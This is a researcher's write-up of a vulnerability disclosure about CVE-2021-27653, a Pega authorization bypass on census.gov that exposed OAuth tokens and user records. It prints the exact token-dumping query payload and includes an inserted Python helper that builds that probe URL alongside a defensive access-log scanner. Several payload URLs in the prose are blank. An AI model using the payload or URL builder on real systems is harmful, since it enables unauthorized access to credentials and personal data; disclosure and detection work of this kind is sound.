Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records

Sakura Samurai identified a vulnerability in the census.gov web application that exposed 10,000 OAuth tokens, user IDs, full names, email addresses, database and table names, and the names of local application privileged group roles together with their associated email addresses. The vulnerability was an instance of CVE-2021-27653, a native misconfiguration of the Pega Chat Access Group portal in Pega Platform 7.4.0 – 8.5.x that leads to unintended data exposure. CVE-2021-27653 was identified by Sakura Samurai in early 2021 and was first used on Ford's Vulnerability Disclosure Program.

Robert Willis initially discovered the vulnerable service on Census while utilizing Google Search operators to identify potentially misconfigured systems on government assets.

Willis observed that ask.census.gov was running Pega Systems software, as indicated by the /prweb/PRServlet/ path in the URL. Many government organizations and corporate enterprises have been noted as running misconfigured Pega instances. Willis also observed that Census had a vulnerability disclosure program offered through the Department of Commerce.

At this point it was apparent that the web application might be vulnerable to CVE-2021-27653, so Willis moved into the exploitation phase of the assessment.

Willis tested the application manually, with hand-crafted requests, to avoid production impact. To exploit the vulnerability, a user must first load the application and confirm that /prweb/ appears in the URL path, at which point the application assigns a session token; a payload link cannot be used until a session token has been assigned. This was accomplished by navigating to the following URL:


As seen in the URL, the portion used as the base for crafting payloads is ‘/prweb/PRServletCustom/app/ECORRAsk/YACFBFye-rFIz_FoGtyvDRUGg1Uzu5Mn*/!STANDARD’

After accessing the application and noting the path, payloads were crafted to bypass the application's authorization requirements.

First, appending ‘?pyActivity=Rule-Obj-ListView.ShowView&pyViewPageName=LISTVIEW_LookUpList&ViewPurpose=LookUpList&ViewOwner=ALL&ViewClass=Data-Admin-Security-OAuth2-AccessToken’ to the base URL made it possible to access 10,000 separate user OAuth tokens.

Next, a payload was crafted that exposed the full name, user ID, email address, and access group, and for some users even the job title:


A payload was then created to access and view Data Admin Security Authentication Profiles:


Finally, internal account groups were enumerated. The following payload allowed viewing the email address, group name, and account type associated with the application:
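The steps above (obtain a session on a /prweb/ path, then append the ListView activity parameters to that path) can be expressed as a small offline helper. The block below is an added example, not code from the original post, from Sakura Samurai or from Pega: it builds the probe URL from the quoted parameter set, classifies a request target that matches the pattern, and runs that classifier over web-server access-log lines so an operator auditing a Pega deployment can look for past attempts and see whether they were served (HTTP 200) or blocked. The host pega.example.com, the combined-format log parser, the "Data-Admin-Security-" severity prefix and the log lines themselves are assumptions constructed for the example; only the application path and the query string are taken from the write-up.

```python
"""Offline helpers for the Pega list-view authorization bypass (CVE-2021-27653)
described above. Added example, not code from the original post, from
Sakura Samurai or from Pega:

  build_probe_url()  - appends the quoted ListView parameters to an existing
                       /prweb/ application URL (the URL reached once a session
                       was assigned).
  classify_request() - flags a request target (path?query) matching the pattern.
  scan_access_log()  - runs classify_request() over access-log lines.

pega.example.com, the log format and the log lines are constructed for the
example; the application path and query string are the ones in the write-up.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Parameter set quoted in the write-up for the OAuth2 access-token list view.
LISTVIEW_PARAMS = {
    "pyActivity": "Rule-Obj-ListView.ShowView",
    "pyViewPageName": "LISTVIEW_LookUpList",
    "ViewPurpose": "LookUpList",
    "ViewOwner": "ALL",
}
TOKEN_CLASS = "Data-Admin-Security-OAuth2-AccessToken"

# Triage assumption: ViewClass values under Data-Admin-Security- hold credential
# material, so hits on them are ranked above other classes.
SENSITIVE_PREFIX = "Data-Admin-Security-"

# Apache/nginx "combined" access-log format (constructed parser).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def build_probe_url(base_url: str, view_class: str = TOKEN_CLASS) -> str:
    """Append the ListView parameters to the URL a session was obtained on.

    base_url must contain /prweb/: the write-up notes the payload only works
    after the application has assigned a session on such a path. Any query
    string already present is kept and the bypass parameters are added to it.
    """
    parts = urlsplit(base_url)
    if "/prweb/" not in parts.path:
        raise ValueError("not a Pega /prweb/ application path; obtain a session first")
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    query.update(LISTVIEW_PARAMS)
    query["ViewClass"] = view_class
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), ""))


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for a request target matching the pattern, else None.

    Parameter names are compared case-insensitively (an assumption, so that
    casing tricks in the query string do not evade the check).
    """
    parts = urlsplit(target)
    if "/prweb/" not in parts.path.lower():
        return None
    qs = {k.lower(): v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if qs.get("pyactivity", "").lower() != "rule-obj-listview.showview":
        return None
    view_class = qs.get("viewclass", "")
    severity = "high" if view_class.startswith(SENSITIVE_PREFIX) else "medium"
    return {"path": parts.path, "view_class": view_class, "severity": severity}


def scan_access_log(lines: List[str]) -> List[dict]:
    """Return one finding per log line whose request matches the pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        finding = classify_request(m.group("target"))
        if finding is None:
            continue
        # 200 means the list view was served; 403 (or another 4xx) means the
        # attempt was rejected, e.g. after Pega's remediation guidance was applied.
        finding.update(ip=m.group("ip"), ts=m.group("ts"),
                       status=int(m.group("status")), served=m.group("status") == "200")
        findings.append(finding)
    return findings


APP_PATH = "/prweb/PRServletCustom/app/ECORRAsk/YACFBFye-rFIz_FoGtyvDRUGg1Uzu5Mn*/!STANDARD"
TOKEN_QUERY = ("pyActivity=Rule-Obj-ListView.ShowView&pyViewPageName=LISTVIEW_LookUpList"
               "&ViewPurpose=LookUpList&ViewOwner=ALL&ViewClass=" + TOKEN_CLASS)

# Constructed sample log: a normal session start, a token list view that was
# served, the same payload rejected by a patched instance, and a junk line.
SAMPLE_LOG = [
    f'198.51.100.7 - - [05/Feb/2021:09:12:01 +0000] "GET {APP_PATH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [05/Feb/2021:09:12:40 +0000] "GET {APP_PATH}?{TOKEN_QUERY} HTTP/1.1" 200 418233 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [05/Feb/2021:10:01:15 +0000] "GET {APP_PATH}?{TOKEN_QUERY} HTTP/1.1" 403 211 "-" "curl/7.74.0"',
    "garbage line that is not an access-log entry",
]

if __name__ == "__main__":
    print(build_probe_url("https://pega.example.com" + APP_PATH))
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']:6} served={f['served']} ViewClass={f['view_class']}")
```

Only the token list view is encoded here because it is the one payload quoted in full on this page; the other views are passed in through the view_class argument when the operator knows the class names for their own deployment. A served hit (status 200 with a large response size) is the signal worth escalating; a 403 against the same query shows the instance rejecting the request as the advisory intends.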

Validation and Disclosure

Willis then asked John Jackson to assist in re-validating the Census vulnerability. Jackson subsequently managed to get in touch with Census so that the vulnerability could be patched before disclosure.

Robert Willis contacted the Department of Commerce (DOC) to ask whether Census was within scope of its published VDP. While waiting for a response, we looked for alternative routes to contact Census. John Jackson then got in touch with Census directly, thanks to Synack, and the vulnerability was analyzed and resolved within hours of first contact. Census took the disclosure seriously and treated the potential criticality of the exposure with the highest respect.

Impact & Remediation
Organizations with Pega deployed in their environment should audit the relevant harnesses to ensure that access-control vulnerabilities are prevented. Pega released a quick guide for checking whether a deployment is vulnerable to CVE-2021-27653:

Pega Security Advisory with Remediation Guidelines

Robert Willis
John Jackson

By Robert Willis (rej_ex)

I'm an infosec, cybersecurity professional who enjoys continuously learning and hacking. I also collect and make comic books. I roll with my crew -- Sakura Samurai. Follow me on Twitter @rej_ex.
